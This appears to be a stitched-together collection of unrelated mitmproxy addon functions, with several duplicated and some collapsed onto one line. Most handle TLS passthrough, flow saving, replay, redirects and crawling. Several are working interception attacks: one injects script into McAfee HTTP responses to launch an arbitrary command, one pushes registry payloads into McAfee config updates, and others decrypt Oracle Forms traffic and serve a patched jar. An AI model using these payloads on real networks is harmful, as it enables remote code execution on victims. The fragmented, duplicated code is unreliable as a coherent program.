def tls_clienthello(self, data: tls.ClientHelloData):
    server_address = data.context.server.peername
    if not self.strategy.should_intercept(server_address):
        ctx.log(f"TLS passthrough: {human.format_address(server_address)}.")
        data.ignore_connection = True
        self.strategy.record_skipped(server_address)
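# The tls_clienthello hook above assumes a `self.strategy` object exposing
# should_intercept() and record_skipped(). A minimal sketch of such a strategy
# follows; the class name and the record_failure() helper are hypothetical and
# not taken from the snippet.
class PassthroughStrategy:
    """Intercept TLS by default; stop intercepting hosts whose handshakes failed."""

    def __init__(self):
        self.skipped = set()   # hosts we deliberately passed through
        self.failed = set()    # hosts where client TLS failed (e.g. certificate pinning)

    def should_intercept(self, server_address) -> bool:
        # Keep intercepting until we have seen a failed handshake for this host.
        return server_address not in self.failed

    def record_skipped(self, server_address) -> None:
        self.skipped.add(server_address)

    def record_failure(self, server_address) -> None:
        self.failed.add(server_address)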
def save_flows_content(path: pathlib.Path, flows: typing.Iterable[flow.Flow]) -> None:
    for f in flows:
        for m in ('request', 'response'):
            message = getattr(f, m)
            message_path = path / "flows" / f.id / m
            os.makedirs(str(message_path / "content"), exist_ok=True)
            with open(str(message_path / 'content.data'), 'wb') as content_file:
                # don't use raw_content here as this is served with a default content type
                if message:
                    content_file.write(message.content)
                else:
                    content_file.write(b'No content.')
            # content_view
            t = time.time()
            if message:
                description, lines, error = contentviews.get_message_content_view(
                    'Auto', message, f)
            else:
                description, lines = 'No content.', []
            if time.time() - t > 0.1:
                ctx.log(
                    "Slow content view: {} took {}s".format(
                        description.strip(),
                        round(time.time() - t, 1)),
                    "info")
            with open(str(message_path / "content" / "Auto.json"), "w") as content_view_file:
                json.dump(
                    dict(lines=list(lines), description=description),
                    content_view_file)
def _handle_event(self, event: events.Event) -> CommandGenerator[None]:
    if isinstance(event, events.Start):
        content = self.flow.request.raw_content
        self.flow.request.timestamp_start = self.flow.request.timestamp_end = time.time()
        yield layers.http.ReceiveHttp(layers.http.RequestHeaders(
            1,
            self.flow.request,
            end_stream=not content,
            replay_flow=self.flow,
        ))
        if content:
            yield layers.http.ReceiveHttp(layers.http.RequestData(1, content))
        yield layers.http.ReceiveHttp(layers.http.RequestEndOfMessage(1))
    elif isinstance(event, (
        layers.http.ResponseHeaders,
        layers.http.ResponseData,
        layers.http.ResponseEndOfMessage,
        layers.http.ResponseProtocolError,
    )):
        pass
    else:  # pragma: no cover
        ctx.log(f"Unexpected event during replay: {event}")
def get_mock(self, flow: http.HTTPFlow):
    service = flow.request.path.split('/')[1]
    raw_url = flow.request.path.split('?')[0]
    raw_url = raw_url.split('/')
    raw_url.pop(0)
    raw_url.pop(0)
    method = '/'.join(map(str, raw_url))
    params = {}
    for key in flow.request.query:
        params[key] = flow.request.query[key]
    for key in flow.request.urlencoded_form:
        params[key] = flow.request.urlencoded_form[key]
    mock = get_matched_config(service, flow.request.method, method, params, self.configs)
    if mock:
        ctx.log("[mocking][{}] {}".format(self.key, method))
        flow.response.text = json.dumps(mock["response"])
        flow.response.status_code = mock["status"]
def save_flows_content(path: pathlib.Path, flows: typing.Iterable[flow.Flow]) -> None:
    for f in flows:
        for m in ('request', 'response'):
            message = getattr(f, m)
            message_path = path / "flows" / f.id / m
            os.makedirs(str(message_path / "content"), exist_ok=True)
            with open(str(message_path / 'content.data'), 'wb') as content_file:
                # don't use raw_content here as this is served with a default content type
                if message:
                    content_file.write(message.content)
                else:
                    content_file.write(b'No content.')
            # content_view
            t = time.time()
            if message:
                description, lines, error = contentviews.get_message_content_view(
                    'Auto', message)
            else:
                description, lines = 'No content.', []
            if time.time() - t > 0.1:
                ctx.log(
                    "Slow content view: {} took {}s".format(
                        description.strip(),
                        round(time.time() - t, 1)),
                    "info")
            with open(str(message_path / "content" / "Auto.json"), "w") as content_view_file:
                json.dump(
                    dict(lines=list(lines), description=description),
                    content_view_file)
def response(self, flow): if b"GDay" in flow.request.content: self.mate = struct.unpack(">I", flow.response.content[4:8])[0] ctx.log.info("Found Mate %08X" % self.mate) self.key[0] = (self.gday >> 8) & 0xff self.key[1] = (self.mate >> 4) & 0xff self.key[2] = 0xae self.key[3] = (self.gday >> 16) & 0xff self.key[4] = (self.mate >> 12) & 0xff self.rc4_req = RC4() self.rc4_req.setKey(self.key) self.rc4_resp = RC4() self.rc4_resp.setKey(self.key) ctx.log("RC4 initialized with key: %s" % ''.join("%02X" % a for a in self.key)) # Noble the handshake flow.response.replace("Mate", "Matf") return if self.key[0] is not None \ and "lservlet" in flow.request.url \ and flow.response.headers['content-type'] == "application/octet-stream": with self.resp_lock: flow.response.content = self.rc4_resp.decrypt([c for c in flow.response.content]) if not flow.response.content.endswith(b"\xf0\x01"): ctx.log.error("[!] Invalid response message?") ctx.log.debug("RESPONSE:\n %s" % binascii.hexlify(flow.response.content))
def request(self, flow):
    if (self.pragma is not None) and ("lservlet" in flow.request.url) and ("pragma" in flow.request.headers):
        try:
            p = int(flow.request.headers["pragma"])
            if abs(p) > self.pragma:
                self.pragma = abs(p)
            else:
                self.pragma += 1
            if p >= 0:
                flow.request.headers["pragma"] = str(self.pragma)
            else:
                flow.request.headers["pragma"] = str(self.pragma * -1)
            ctx.log("[!] Set Pragma to %d" % self.pragma)
        except ValueError:
            pass

    if flow.request.content[0:4] == b"GDay":
        self.key = [None] * 5
        self.mate = None
        self.rc4_req = None
        self.rc4_resp = None
        self.gday = struct.unpack(">I", flow.request.content[4:8])[0]
        self.pragma = 1
        ctx.log.info("Found GDay %08X" % self.gday)
        return

    if self.key[0] is not None and "lservlet" in flow.request.url:
        ctx.log.debug("REQUEST:\n %s" % binascii.hexlify(flow.request.content))
        if len(flow.request.content) == 0:
            ctx.log.warn("[!] Empty message")
            return
        if not flow.request.content.endswith(b"\xf0\x01"):
            ctx.log.error("[!] Invalid request message?")
        with self.req_lock:
            flow.request.content = bytes(self.rc4_req.encrypt(flow.request.content))
def deal_data(url, text, selector):
    """
    Process the response content.
    :return:
    """
    if 'ArticleTitle' in text and 't20131029_1012002' not in url:
        redis_db.sadd(content_key, text)
        ctx.log('Detail content fetched successfully and cached to redis!')
def deal_data(url, text, selector):
    """
    Process the response content.
    :return:
    """
    if 'ArticleTitle' in text:
        redis_db.sadd(content_key, text)
        ctx.log('Detail content fetched successfully and cached to redis!')
def request(flow: http.HTTPFlow) -> None:
    ctx.log(flow.request.pretty_host)
    if flow.request.pretty_host.endswith("picobrew.com"):
        ctx.log(flow.request.path)
        flow.request.host = picobrew_server['host']
        flow.request.port = picobrew_server['port']
        flow.request.scheme = picobrew_server['scheme']
        flow.request.headers['Host'] = picobrew_server['host']
def response(flow: mitmproxy.http.HTTPFlow):
    if flow.request.url.find("https://static.geetest.com/static/js/slide.7.7.4.js") > -1:
        ctx.log("replace slide.7.7.4.js")
        with open("./statics/bin/ddd_mogujie_geetest.js", "r", encoding="utf8") as fp:
            js = fp.read()
        flow.response.set_text(js)
async def stats(self):
    while True:
        await asyncio.sleep(1.0)
        if self._flushes >= self._target:
            self._log(f"AVG : {mean(self.results)}")
            ctx.log("<== Benchmark Ended. Shutting down... ==>")
            if self.out:
                self.out.close()
            self.temp.close()
            ctx.master.shutdown()
def request(flow):
    if ctx.options.partial_url in flow.request.pretty_url:
        original_url = flow.request.pretty_url
        print("Matched URL for redirect: '{}'".format(original_url))
        ctx.log(flow.request.path)
        parsed_new_url = urlparse(ctx.options.new_url)
        flow.request.host = parsed_new_url.netloc
        flow.request.path = parsed_new_url.path
        flow.request.headers["Host"] = parsed_new_url.netloc
        print("Redirected url '{}' to '{}'.\n".format(original_url, ctx.options.new_url))
def response(self, flow):
    if flow.request.is_replay:
        self._flow.response = flow.response
        self._flow.resume()
        return
    if flow.response.status_code == 401:
        self.refresh_token, self.auth_token = ot.refresh_token(self.refresh_token)
        ctx.log("refreshed authorization Bearer token")
        flow2 = flow.copy()
        ctx.master.commands.call("replay.client", [flow2])
        flow.intercept()
        self._flow = flow
async def playback(self):
    while True:
        self.inflight = await self.queue.get()
        try:
            h = ReplayHandler(self.inflight, self.options)
            await h.replay()
        except Exception:
            ctx.log(f"Client replay has crashed!\n{traceback.format_exc()}", "error")
        self.queue.task_done()
        self.inflight = None
def article_content(self, flow: http.HTTPFlow) -> None:
    """
    Extract the article content.
    :param flow: the HTTP flow
    """
    text = flow.response.text
    request_url = flow.request.url
    """if len(self.sn_list) == 0:
        biz = re.search(r'__biz=([a-zA-Z0-9|=]+)', request_url).group(1)
        self.sn_list = self._data_service.get_blank_msg(biz)
        self.sn_p = -1
        weixin_id = re.search(r'<span class="profile_meta_value">(.*?)</span>', text).group(1)
        account = self._data_service.get_account(biz)
        account.weixin_id = weixin_id
        account.updated_time = datetime.datetime.now()
        self._data_service.save_account(account)
    else:"""
    # Pull out the article and update its content
    """content = ""
    for t in re.findall(r'<p(.*?)>(.*?)</p>', text):
        line = self._remove_escapes(t[1])
        if re.match(r'<br(.*?)>', line) is not None:
            line = '\n'
        elif re.match(r'<img(.*?)/>', line) is not None:
            line = re.search(r'data-src="(.*?)" ', line).group(1) + '\n'
        else:
            line = re.sub(r'<(.*?)>', '', line) + '\n'
        content += line
    msg: Msg = self._data_service.get_msg(self.sn_list[self.sn_p])
    msg.content = content
    msg.updated_time = datetime.datetime.now()
    self._put_msg(msg)
    self.sn_p += 1"""
    if self.msg is not None:
        content = Content()
        content.msg_id = self.msg.id
        ctx.log(str(self.msg.id))
        content.content = str(text)
        content.crawled_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        self._data_service.save_content(content)
    # If there are still articles waiting to be crawled, set up the next-hop redirect
    # if self.sn_p < len(self.sn_list):
    # msg: Msg = self._data_service.get_msg(self.sn_list[self.sn_p])
    self.msg = self._data_service.get_uncrawled_link()
    next_link = self.msg.msg_link
    delay_time = int(random.random() * 2 + 1)
    insert_meta = '<meta http-equiv="refresh" content="' + str(delay_time) + ';url=' + next_link + '" />'
    text = text.replace('</title>', '</title>' + insert_meta)
    flow.response.set_text(text)
async def playback(self):
    while True:
        self.inflight = await self.queue.get()
        try:
            h = ReplayHandler(self.inflight, self.options)
            if ctx.options.client_replay_concurrency == -1:
                asyncio_utils.create_task(h.replay(), name="client playback awaiting response")
            else:
                await h.replay()
        except Exception:
            ctx.log(f"Client replay has crashed!\n{traceback.format_exc()}", "error")
        self.queue.task_done()
        self.inflight = None
def _handle_hidden_redirect(context, flow, original_host):
    """
    If a host is configured to be silently redirected to another host,
    we can simply rewrite the parameters on the flow.
    """
    redirect_host = context.get_redirect(original_host)
    if redirect_host:
        ctx.log("[spoofing][{}] redirect {} to {}".format(context.key, original_host, redirect_host))
        flow.request.host = redirect_host
        flow.request.port = 80
        flow.request.scheme = 'http'
        flow.request.headers["Host"] = redirect_host
def load(l):
    global rules
    blocklists = glob("easylists/*")
    if len(blocklists) == 0:
        ctx.log("Error, no blocklists found in 'easylists/'. Please run the 'update-blocklists' script.")
        raise SystemExit
    else:
        ctx.log("* Loading adblock rules...")
        for blocklist in blocklists:
            ctx.log("  |_ %s" % blocklist)
        rules = load_rules(blocklists)
        ctx.log("")
        ctx.log("* Done! Proxy server is ready to go!")
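# load_rules() is not shown above. Assuming the files under easylists/ are
# EasyList-style filter lists, a minimal sketch using the third-party
# adblockparser package could look like this (hypothetical helper, not the
# original implementation):
from adblockparser import AdblockRules


def load_rules(blocklists):
    raw_rules = []
    for path in blocklists:
        with open(path, "r", encoding="utf-8", errors="ignore") as f:
            # Skip blank lines and "!" comment lines used by EasyList files.
            raw_rules.extend(
                line.strip() for line in f
                if line.strip() and not line.startswith("!")
            )
    return AdblockRules(raw_rules)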
def next_layer(nextlayer: layer.NextLayer):
    ctx.log(
        f"{nextlayer.context=}\n"
        f"{nextlayer.data_client()[:70]=}\n"
        f"{nextlayer.data_server()[:70]=}\n"
    )
    if nextlayer.context.server.address == ("example.com", 443):
        nextlayer.context.server.address = ("example.com", 80)
        # We are disabling ALPN negotiation as our curl client would otherwise agree on HTTP/2,
        # which our example server here does not accept for plaintext connections.
        nextlayer.context.client.alpn = b""
        # We know all layers that come next: First negotiate TLS with the client, then do simple TCP passthrough.
        # Setting only one layer here would also work, in that case next_layer would be called again after TLS establishment.
        nextlayer.layer = layers.ClientTLSLayer(nextlayer.context)
        nextlayer.layer.child_layer = layers.TCPLayer(nextlayer.context)
def response(self, flow: http.HTTPFlow):
    if flowfilter.match(self.http_code_ok, flow):
        # Only handle responses with a 200 status code.
        ctx.log('code %s' % flow.response.status_code)
        # Match the target URL.
        if flowfilter.match(self.MOVIE_path, flow):
            if flow.response.content:
                pretty_path = str(flow.request.path.rstrip())
                pretty_path = pretty_path.replace('/', '_') \
                    .replace(':', '_') \
                    .replace('&', '_')
                pretty_path = pretty_path[:250] + '.json'
                res_content = flow.response.content.decode('utf-8')
                path = os.path.join(self.folder_path, pretty_path)
                with open(path, 'w+', encoding='utf-8') as f:
                    f.write(str(res_content) + '\n')
                print("Saved successfully")
def response(flow):
    if flow.request.scheme == "http" and "mscconfig.asp" in flow.request.url:
        try:
            oxml = etree.XML(flow.response.content)
            oxml.set("frequency", "1")
            update = oxml.xpath("//webservice-response/update")[0]
            for r in REG:
                reg = etree.SubElement(update, "reg")
                reg.set("key", r["key"])
                reg.set("type", r["type"])
                reg.set("obfuscate", "0")
                reg.set("name", r["name"])
                reg.set("value", r["value"])
            # ctx.log(etree.tostring(oxml))
            flow.response.content = etree.tostring(oxml)
            ctx.log("[+] [MCREGGELI] Payload sent")
        except etree.XMLSyntaxError:
            ctx.log("[-] [MCREGGELI] XML deserialization error")
def cach_task(url, text, selector):
    """
    Cache crawl tasks.
    :return:
    """
    # Cache the pagination tasks
    page_count = re.findall(r"createPageHTML\((\d+)", text, re.S)
    if page_count and 'index_' not in url:
        url_list = []
        for page in range(1, int(page_count[0])):
            url_list.append(urljoin(url, 'index_{}.shtml'.format(page)))
        redis_db.sadd(catlog_key, *url_list)
        ctx.log('Cached catlog_page_list successfully!')
    # Cache the detail-page tasks
    detail_url_list = selector.css('.lsj-list li a::attr(href)').extract()
    if detail_url_list:
        redis_db.sadd(detail_key, *detail_url_list)
        ctx.log('Cached detail_url_list successfully!')
def next_layer(next_layer):
    """
    This hook does the actual magic - if the next layer is planned to be a TLS layer,
    we check if we want to enter pass-through mode instead.
    """
    if isinstance(next_layer, TlsLayer) and next_layer._client_tls:
        server_address = next_layer.server_conn.address
        if tls_strategy.should_intercept(server_address):
            # We try to intercept.
            # Monkey-Patch the layer to get feedback from the TLSLayer if interception worked.
            ctx.log('aaaa')
            next_layer.__class__ = TlsFeedback
        else:
            # We don't intercept - reply with a pass-through layer and add a "skipped" entry.
            mitmproxy.ctx.log("TLS passthrough for %s" % repr(next_layer.server_conn.address), "info")
            next_layer_replacement = RawTCPLayer(next_layer.ctx, ignore=True)
            next_layer.reply.send(next_layer_replacement)
            tls_strategy.record_skipped(server_address)
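# The TlsFeedback class that next_layer() monkey-patches in is not shown above.
# A sketch along the lines of the legacy mitmproxy tls_passthrough example,
# assuming a module-level tls_strategy with record_success()/record_failure()
# (which the snippet does not define), could look like this:
class TlsFeedback(TlsLayer):
    """
    Override _establish_tls_with_client so we learn whether client TLS
    interception actually succeeded (it fails e.g. with certificate pinning).
    """

    def _establish_tls_with_client(self):
        server_address = self.server_conn.address
        try:
            super(TlsFeedback, self)._establish_tls_with_client()
        except TlsProtocolException as e:
            tls_strategy.record_failure(server_address)
            raise e
        else:
            tls_strategy.record_success(server_address)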
def save_content(self, content: Content):
    # ctx.log(content.msg_id)
    ctx.log(content.crawled_time)
    cursor = self.db.cursor()
    pymysql.escape_string("'")
    sql1 = "INSERT INTO content(msg_id, content, crawled_time) VALUES ('%d', \'%s\', '%s')" % (
        content.msg_id, pymysql.escape_string(content.content), content.crawled_time)
    sql2 = "UPDATE tmp_uncrawled_articles SET content_gotten = 1 WHERE id = '%d'" % content.msg_id
    try:
        # Execute the SQL statements
        cursor.execute(sql1)
        cursor.execute(sql2)
        # Commit the transaction
        self.db.commit()
    except Exception as e:
        # Roll back on error
        self.db.rollback()
        ctx.log(str(e))
async def writer(self):
    while True:
        await asyncio.sleep(self._flush_period)
        count = 1
        f = await self.queue.get()
        self.hot_flows.append(f)
        while count < self._flush_rate:
            try:
                self.hot_flows.append(self.queue.get_nowait())
                count += 1
            except asyncio.QueueEmpty:
                pass
        start = time.perf_counter()
        n = self._fflush()
        end = time.perf_counter()
        self._log(f"dumps/time ratio: {n} / {end-start} -> {n/(end-start)}")
        self.results.append(n / (end - start))
        self._flushes += n
        self._log(f"Flows dumped: {self._flushes}")
        ctx.log(f"Progress: {min(100.0, 100.0 * (self._flushes / self._target))}%")
def response(flow):
    if flow.request.scheme == "http" and (
            flow.request.headers['host'].endswith("mcafee.com") or "mcafee" in flow.request.url):
        if flow.response.status_code == 302:
            ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (HTML)")
            https_url = flow.request.url.replace("http://", "https://")
            r = requests.get(https_url, headers=flow.request.headers, verify=False)
            if "text/html" not in r.headers['content-type']:
                return
            contents = r.text
            contents = contents.replace(
                "</head>",
                "<script>try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}</script></head>" % (COMMAND, CMDARGS))
            flow.response = http.HTTPResponse.make(
                200,
                bytes(contents, encoding="utf-8"),
                {
                    "Content-Type": "text/html; charset=utf-8",
                    "Expires": "-1"
                })
            return
        try:
            if flow.response.headers["content-type"] == "text/javascript":
                ctx.log("[+] [MCSPLOIT] Insecure McAfee request found! (JS)")
                inject = "try{window.external.LaunchApplication(\"%s\",\"%s\");}catch(launchapperr){var x;}\n" % (
                    COMMAND, CMDARGS)
                try:
                    # Prepend the injected JS to the original response body.
                    flow.response.content = inject.encode("utf-8") + flow.response.content
                except (AttributeError, TypeError):
                    ctx.log("[-] [MCSPLOIT] No content in the original response!")
        except KeyError:
            pass
def response(self, flow): if "frmall.jar" in flow.request.url: ctx.log("Serving patched frmall.jar") patched = open("/tmp/frmall.jar", "rb").read() flow.response.content = patched flow.response.headers["content-length"] = str(len(patched)) flow.response.status_code = 200 return if b"GDay" in flow.request.content: self.mate = struct.unpack(">I", flow.response.content[4:8])[0] ctx.log("Found Mate %s" % repr(flow.response.raw_content)) #Found GDay! be862007 #Found Mate! 000055f0 #RC4 Key: 205fae8605 self.key[0] = (self.gday >> 8) & 0xff self.key[1] = (self.mate >> 4) & 0xff self.key[2] = 0xae self.key[3] = (self.gday >> 16) & 0xff self.key[4] = (self.mate >> 12) & 0xff self.rc4_req = RC4() self.rc4_req.setKey(self.key) self.rc4_resp = RC4() self.rc4_resp.setKey(self.key) ctx.log("RC4 initialized with key: %s" % (repr(self.key))) return if self.key[0] != None and "lservlet" in flow.request.url: with self.resp_lock: flow.response.content = self.rc4_resp.decrypt( [c for c in flow.response.content]) if not flow.response.content.endswith(b"\xf0\x01"): ctx.log("[!] Invalid response message?") ctx.log("RESPONSE:\n %s" % binascii.hexlify(flow.response.content))
def running(self):
    if not self.streaming:
        ctx.log("<== Serialization Benchmark Enabled ==>")
        self.tf = tflow.tflow()
        self.tf.request.content = b'A' * ctx.options.testflow_size
        ctx.log(f"With content size: {len(self.tf.request.content)} B")
        if ctx.options.benchmark_save_path:
            ctx.log(f"Storing results to {ctx.options.benchmark_save_path}")
            self.out = open(ctx.options.benchmark_save_path, "w")
        self.dbh = db.DBHandler(self.temp.name, mode='write')
        self.streaming = True
        tasks = (self.stream, self.writer, self.stats)
        self.loop.create_task(asyncio.gather(*(t() for t in tasks)))
def request(self, flow):
    flow.request.http_version = "HTTP/1.0"  # Workaround for MitMproxy bug #1721
    if flow.request.content[0:4] == b"GDay":
        self.key = [None] * 5
        self.mate = None
        self.rc4_req = None
        self.rc4_resp = None
        self.gday = struct.unpack(">I", flow.request.content[4:8])[0]
        ctx.log("Found GDay %X" % self.gday)
        return

    if self.key[0] is not None and "lservlet" in flow.request.url:
        ctx.log("REQUEST:\n %s" % binascii.hexlify(flow.request.content))
        if not flow.request.content.endswith(b"\xf0\x01"):
            ctx.log("[!] Invalid request message?")
        with self.req_lock:
            flow.request.content = bytes(self.rc4_req.encrypt(flow.request.content))
def done():
    """
    Called once on script shutdown, after any other events.
    """
    if not hasattr(context, "HARLog"):
        return

    import pprint
    import json

    json_dump = context.HARLog.json(log=True)
    compressed_json_dump = context.HARLog.compress()

    if context.dump_file == '-':
        context.log(pprint.pformat(json.loads(json_dump)))
    elif context.dump_file.endswith('.zhar'):
        open(context.dump_file, "wb").write(compressed_json_dump)
    else:
        open(context.dump_file, "w").write(json_dump)
    context.log("HAR log finished with %s bytes (%s bytes compressed)" % (
        len(json_dump), len(compressed_json_dump)))
    context.log("Compression rate is %s%%" % str(
        100. * len(compressed_json_dump) / len(json_dump)))
def response(self, flow):
    if not ctx.options.corrupt_handshake and "frmall.jar" in flow.request.url:
        ctx.log("Serving patched frmall.jar")
        patched = open("/tmp/frmall.jar", "rb").read()
        flow.response.content = patched
        flow.response.headers["content-length"] = str(len(patched))
        flow.response.status_code = 200
        return

    if b"GDay" in flow.request.content:
        self.mate = struct.unpack(">I", flow.response.content[4:8])[0]
        ctx.log("Found Mate %s" % repr(flow.response.raw_content))
        # Found GDay! be862007
        # Found Mate! 000055f0
        # RC4 Key: 205fae8605
        self.key[0] = (self.gday >> 8) & 0xff
        self.key[1] = (self.mate >> 4) & 0xff
        self.key[2] = 0xae
        self.key[3] = (self.gday >> 16) & 0xff
        self.key[4] = (self.mate >> 12) & 0xff
        self.rc4_req = RC4()
        self.rc4_req.setKey(self.key)
        self.rc4_resp = RC4()
        self.rc4_resp.setKey(self.key)
        ctx.log("RC4 initialized with key: %s" % (repr(self.key)))
        if ctx.options.corrupt_handshake:
            flow.response.replace("Mate", "Matf")
        return

    if b"ifError:11/" in flow.response.content:
        with self.resp_lock:
            with self.req_lock:
                # We don't want any interference with other requests
                wait = int(flow.response.content.split(b"/")[1])
                headers = flow.request.headers
                self.pragma = abs(self.pragma)  # making sure Pragma is not negative
                while True:
                    self.total_wait += wait
                    if ctx.options.max_wait >= 0 and self.total_wait > ctx.options.max_wait:
                        break
                    ctx.log("[!] Handling ifError:11 - %d ms timeout" % wait)
                    time.sleep(wait / 1000.0)
                    self.pragma += 1
                    headers["Pragma"] = "%d" % (-1 * self.pragma)
                    headers["Content-Length"] = "0"
                    r = requests.post(flow.request.url, headers=headers, data=None)
                    if r.headers['content-type'] == "text/plain":
                        wait = int(r.content.split(b"/")[1])
                    else:
                        flow.response.content = self.rc4_resp.decrypt([c for c in r.content])
                        flow.response.headers["Content-Type"] = "application/octet-stream"
                        flow.response.headers["Content-Length"] = str(len(flow.response.content))
                        self.total_wait = 0
                        ctx.log("[+] Timeout handled")
                        break
        return  # Response already decrypted, we can return now

    if self.key[0] is not None and "lservlet" in flow.request.url \
            and flow.response.headers['content-type'] == "application/octet-stream":
        with self.resp_lock:
            self.total_wait = 0
            flow.response.content = self.rc4_resp.decrypt([c for c in flow.response.content])
            if not flow.response.content.endswith(b"\xf0\x01"):
                ctx.log("[!] Invalid response message?")
            ctx.log("RESPONSE:\n %s" % binascii.hexlify(flow.response.content))
def request(self, flow): ctx.log("Max wait: %d" % ctx.options.max_wait) #flow.request.http_version="HTTP/1.0" # Workaround for MitMproxy bug #1721 if (self.pragma!=None) and ("lservlet" in flow.request.url) and ("pragma" in flow.request.headers): try: p=int(flow.request.headers["pragma"]) if abs(p)>self.pragma: self.pragma=abs(p) else: self.pragma+=1 if p>=0: flow.request.headers["pragma"]=str(self.pragma) else: flow.request.headers["pragma"]=str(self.pragma*-1) ctx.log("[!] Set Pragma to %d" % self.pragma) except ValueError: pass if flow.request.content[0:4]==b"GDay": self.key=[None]*5 self.mate=None self.rc4_req=None self.rc4_resp=None self.gday=struct.unpack(">I",flow.request.content[4:8])[0] self.pragma=1 ctx.log("Found GDay %X" % self.gday) return if self.key[0]!=None and "lservlet" in flow.request.url: ctx.log("REQUEST:\n %s" % binascii.hexlify(flow.request.content)) if len(flow.request.content)==0: ctx.log("[!] Empty message") return if not flow.request.content.endswith(b"\xf0\x01"): ctx.log("[!] Invalid request message?") with self.req_lock: flow.request.content=bytes(self.rc4_req.encrypt(flow.request.content))
def _log(self, msg):
    if self.out:
        self.out.write(msg + '\n')
    else:
        ctx.log(msg)